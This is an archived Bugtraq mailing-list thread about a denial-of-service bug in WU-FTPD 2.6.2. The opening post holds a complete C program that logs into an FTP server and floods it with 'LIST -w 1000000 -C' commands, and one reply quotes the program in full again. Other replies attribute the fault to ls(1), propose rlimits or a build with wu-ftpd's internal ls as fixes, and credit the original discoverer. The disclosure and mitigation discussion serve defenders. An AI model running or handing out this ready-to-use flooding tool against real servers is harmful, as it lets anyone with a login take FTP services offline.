10912272 2003-10-31 14:55 +0000 /123 rader/ Angelo Rosiello <angelo.rosiello@katamail.com>
Importerad: 2003-10-31 18:07 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29702>
Ärende: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Angelo Rosiello <angelo.rosiello@katamail.com>
To: bugtraq@securityfocus.com
Message-ID: <20031031145543.19772.qmail@sf-www3-symnsj.securityfocus.com>
http://www.rosiello.org
Vulnerabilities Section.
/*
*
* http://www.rosiello.org
* (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail : angelo@rosiello.org
* URL : http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
void addr_initialize( );
void usage( );
/*
 * Proof-of-concept client for the "WU-FTPD 2.6.2 Freezer" report.
 *
 * Command line: <IP> <PORT> <USER> <PASS> <LOOP>.
 * Flow: connect to the FTP server, read one line, send USER and PASS
 * (reading one reply line after each), then send the command
 * "LIST -w 1000000 -C" LOOP times and close the socket.
 *
 * Defender's view: that literal LIST argument string is what would show up
 * in FTP command logs. Replies in this thread attribute the resource
 * consumption to ls(1) run by the server and suggest rlimits, or a wu-ftpd
 * built with its internal ls code, as mitigations.
 *
 * NOTE(review): exit(), atoi(), inet_addr(), write() and close() are used
 * although <stdlib.h>, <arpa/inet.h> and <unistd.h> are not among the
 * includes above, so they are implicitly declared here.
 */
int main( int argc, char **argv )
{
int i, sd, PORT, loop, error;
/* NOTE(review): ch has no initial value, yet the first reply loop below
 * tests it before recv() has written to it. */
char user[30], password[30], ch;
struct sockaddr_in server_addr;
fprintf( stdout, "\n(c) Rosiello Security 2003\n" ); fprintf(
stdout, "http://www.rosiello.org\n" ); fprintf( stdout,
"WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );
/* usage() prints the expected arguments and exits. */
if( argc != 6 ) usage( argv[0] );
/* Credentials longer than 20 characters end the program silently with
 * status 0. With the 5-byte verb, the newline and the terminator the
 * longest command is 27 bytes, which fits the 30-byte buffers. */
if( strlen( argv[3] ) > 20 ) exit( 0 );
if( strlen( argv[4] ) > 20 ) exit( 0 );
sprintf( user, "USER %s\n", argv[3] );
sprintf( password, "PASS %s\n", argv[4] );
/* atoi() reports no errors; non-numeric input is not detected here. */
PORT = atoi( argv[2] );
loop = atoi( argv[5] );
/* NOTE(review): the socket() result is not checked; only connect() is. */
addr_initialize( &server_addr, PORT, ( long )inet_addr(
argv[1] )); sd = socket( AF_INET, SOCK_STREAM, 0 );
error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
if( error != 0 )
{
perror( "Something wrong with the connection" );
/* A failed connection still exits with status 0. */
exit( 0 );
}
/* Echo the server's first line (presumably the FTP greeting) byte by byte.
 * NOTE(review): the recv() result is ignored, so a closed or failed
 * connection never ends this loop; the two loops further down share this. */
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
/* Reset so the next reply loop does not stop on the newline just read. */
ch = '\0';
printf( "Connection executed, now waiting to log in...\n" );
printf( "%s", user );
send( sd, user, strlen( user ), 0 );
/* Echo one line of the reply to USER. */
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
printf( "%s", password );
ch = '\0';
send( sd, password, strlen( password ), 0 );
/* Echo one line of the reply to PASS; the reply code is not examined, so
 * the program continues whether or not the login was accepted. */
while ( ch != '\n' )
{
recv( sd, &ch, 1, 0);
printf("%c", ch );
}
printf( "Sending the DoS query\n" );
/* The 19-byte LIST command is written loop times; the results of write()
 * are ignored and no server reply is read afterwards. */
for( i=0; i<loop; i++ )
{
write( sd, "LIST -w 1000000 -C\n", 19 );
}
printf( "All done\n" );
close( sd );
return 0;
}
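/*
 * Fill in an IPv4 socket address.
 *
 * address: structure to initialise; left untouched when NULL.
 * port:    TCP port in host byte order; converted with htons().
 * IPaddr:  IPv4 address stored as given, so it must already be in network
 *          byte order (the caller in this file passes the inet_addr() result).
 *
 * The structure is cleared first so that sin_zero and any platform-specific
 * members do not carry leftover stack contents into connect().
 */
void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
    if (address == NULL) {
        return;
    }

    memset(address, 0, sizeof *address);
    address->sin_family = AF_INET;
    /* unsigned short is the standard spelling of the BSD-only u_short */
    address->sin_port = htons((unsigned short)port);
    /* s_addr is 32 bits wide; the explicit cast documents the narrowing from long */
    address->sin_addr.s_addr = (in_addr_t)IPaddr;
}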
/*
 * Print the expected command line to stdout and end the process.
 *
 * program: name shown between angle brackets, argv[0] at the call site.
 * Does not return; the exit status is 0 even though it reports misuse.
 */
void usage( char *program )
{
    printf( "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program );
    exit( 0 );
}
(10912272) /Angelo Rosiello <angelo.rosiello@katamail.com>/(Ombruten)
Kommentar i text 10913146 av Seth Arnold <sarnold@wirex.com>
10913146 2003-10-31 11:40 -0800 /19 rader/ Seth Arnold <sarnold@wirex.com>
Importerad: 2003-10-31 22:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29718>
Kommentar till text 10912272 av Angelo Rosiello <angelo.rosiello@katamail.com>
Ärende: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Seth Arnold <sarnold@wirex.com>
To: bugtraq@securityfocus.com
Message-ID: <20031031194044.GD27612@wirex.com>
On Fri, Oct 31, 2003 at 02:55:43PM -0000, Angelo Rosiello wrote:
> for( i=0; i<loop; i++ )
> {
> write( sd, "LIST -w 1000000 -C\n", 19 );
> }
It is probably worth pointing out that it is FSF ls(1) at fault here;
wu-ftpd just provides a convenient way for potentially unauthenticated
users to DoS the machine. If your OS supports rlimits (ulimit(3)), I
believe they will provide reliable protection against this problem.
--
http://www.immunix.com/ secure Linux distributions and appliances
(10913146) /Seth Arnold <sarnold@wirex.com>/--------
Bilaga (application/pgp-signature) i text 10913147
Kommentar i text 10915839 av Luca Berra <bluca@comedia.it>
10913147 2003-10-31 11:40 -0800 /9 rader/ Seth Arnold <sarnold@wirex.com>
Importerad: 2003-10-31 22:57 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29719>
Bilaga (application/pgp-signature) till text 10913146
Ärende: Bilaga till: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE/orq8+9nuM9mwoJkRAgdOAJ9BKH1M6dHOB63SWQWdmJH9r4vMHgCgn5qx
g3SVe+lkRu0sQVKiQQwSFhU=
=IzZd
-----END PGP SIGNATURE-----
(10913147) /Seth Arnold <sarnold@wirex.com>/--------
10915839 2003-11-01 15:47 +0100 /31 rader/ Luca Berra <bluca@comedia.it>
Importerad: 2003-11-01 23:26 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29724>
Kommentar till text 10913146 av Seth Arnold <sarnold@wirex.com>
Ärende: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Luca Berra <bluca@comedia.it>
To: bugtraq@securityfocus.com
Message-ID: <20031101144736.GG875@percy.comedia.it>
On Fri, Oct 31, 2003 at 11:40:44AM -0800, Seth Arnold wrote:
>On Fri, Oct 31, 2003 at 02:55:43PM -0000, Angelo Rosiello wrote:
>> for( i=0; i<loop; i++ )
>> {
>> write( sd, "LIST -w 1000000 -C\n", 19 );
>> }
>
>It is probably worth pointing out that it is FSF ls(1) at fault here;
>wu-ftpd just provides a convenient way for potentially unauthenticated
>users to DoS the machine. If your OS supports rlimits (ulimit(3)), I
>believe they will provide reliable protection against this problem.
It might also be worth noting that wu-ftpd can be rebuilt with its
internal ls code, so that LIST no longer depends on the external ls(1).
regards,
L.
--
Luca Berra -- bluca@comedia.it
Communication Media & Services S.r.l.
/"\
\ / ASCII RIBBON CAMPAIGN
X AGAINST HTML MAIL
/ \
(10915839) /Luca Berra <bluca@comedia.it>/(Ombruten)
10915912 2003-11-01 09:05 -0700 /248 rader/ Rossen Petrov <rpetrov@gmx.net>
Importerad: 2003-11-01 23:36 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <29730>
Ärende: Re: WU-FTPD 2.6.2 Freezer
------------------------------------------------------------
From: Rossen Petrov <rpetrov@gmx.net>
To: bugtraq@securityfocus.com
Message-ID: <6.0.0.22.2.20031101085553.01b7a860@mail.gmx.net>
let's not forget to give credit where credit is due. the bug was
discovered by Georgi Guninski and is documented in his 10/22/03
advisory at http://www.guninski.com/binls.html
Rossen
At 07:55 31.10.2003 you wrote:
>http://www.rosiello.org
>
>Vulnerabilities Section.
>
>
>
>
>
>/*
>
>*
>
>* http://www.rosiello.org
>
>* (c) Rosiello Security
>
>*
>
>* Copyright Rosiello Security 2003
>
>* All Rights reserved.
>
>*
>
>* Tested on Red Hat 9.0
>
>*
>
>* Author: Angelo Rosiello
>
>* Mail : angelo@rosiello.org
>
>* URL : http://www.rosiello.org
>
>*
>
>* This software is only for educational purpose.
>
>* Do not use it against machines different from yours.
>
>* Respect law.
>
>*
>
>*/
>
>
>
>#include <stdio.h>
>
>#include <sys/types.h>
>
>#include <sys/socket.h>
>
>#include <netinet/in.h>
>
>#include <string.h>
>
>
>
>void addr_initialize( );
>
>void usage( );
>
>
>
>int main( int argc, char **argv )
>
>{
>
> int i, sd, PORT, loop, error;
>
> char user[30], password[30], ch;
>
> struct sockaddr_in server_addr;
>
>
>
> fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
>
> fprintf( stdout, "http://www.rosiello.org\n" );
>
> fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );
>
>
>
> if( argc != 6 ) usage( argv[0] );
>
>
>
> if( strlen( argv[3] ) > 20 ) exit( 0 );
>
> if( strlen( argv[4] ) > 20 ) exit( 0 );
>
>
>
> sprintf( user, "USER %s\n", argv[3] );
>
> sprintf( password, "PASS %s\n", argv[4] );
>
>
>
> PORT = atoi( argv[2] );
>
> loop = atoi( argv[5] );
>
>
>
> addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
>
> sd = socket( AF_INET, SOCK_STREAM, 0 );
>
>
>
> error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof(
> server_addr ));
>
> if( error != 0 )
>
> {
>
> perror( "Something wrong with the connection" );
>
> exit( 0 );
>
> }
>
>
>
> while ( ch != '\n' )
>
> {
>
> recv( sd, &ch, 1, 0);
>
> printf("%c", ch );
>
> }
>
>
>
> ch = '\0';
>
>
>
> printf( "Connection executed, now waiting to log in...\n" );
>
>
>
> printf( "%s", user );
>
>
>
> send( sd, user, strlen( user ), 0 );
>
> while ( ch != '\n' )
>
> {
>
> recv( sd, &ch, 1, 0);
>
> printf("%c", ch );
>
> }
>
> printf( "%s", password );
>
>
>
> ch = '\0';
>
>
>
> send( sd, password, strlen( password ), 0 );
>
> while ( ch != '\n' )
>
> {
>
> recv( sd, &ch, 1, 0);
>
> printf("%c", ch );
>
> }
>
>
>
> printf( "Sending the DoS query\n" );
>
> for( i=0; i<loop; i++ )
>
> {
>
> write( sd, "LIST -w 1000000 -C\n", 19 );
>
> }
>
> printf( "All done\n" );
>
> close( sd );
>
> return 0;
>
>}
>
>
>
>void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
>
>{
>
> address -> sin_family = AF_INET;
>
> address -> sin_port = htons((u_short)port);
>
> address -> sin_addr.s_addr = IPaddr;
>
>}
>
>
>
>void usage( char *program )
>
>{
>
> fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n",
> program);
>
> exit(0);
>
>}
(10915912) /Rossen Petrov <rpetrov@gmx.net>/(Ombruten)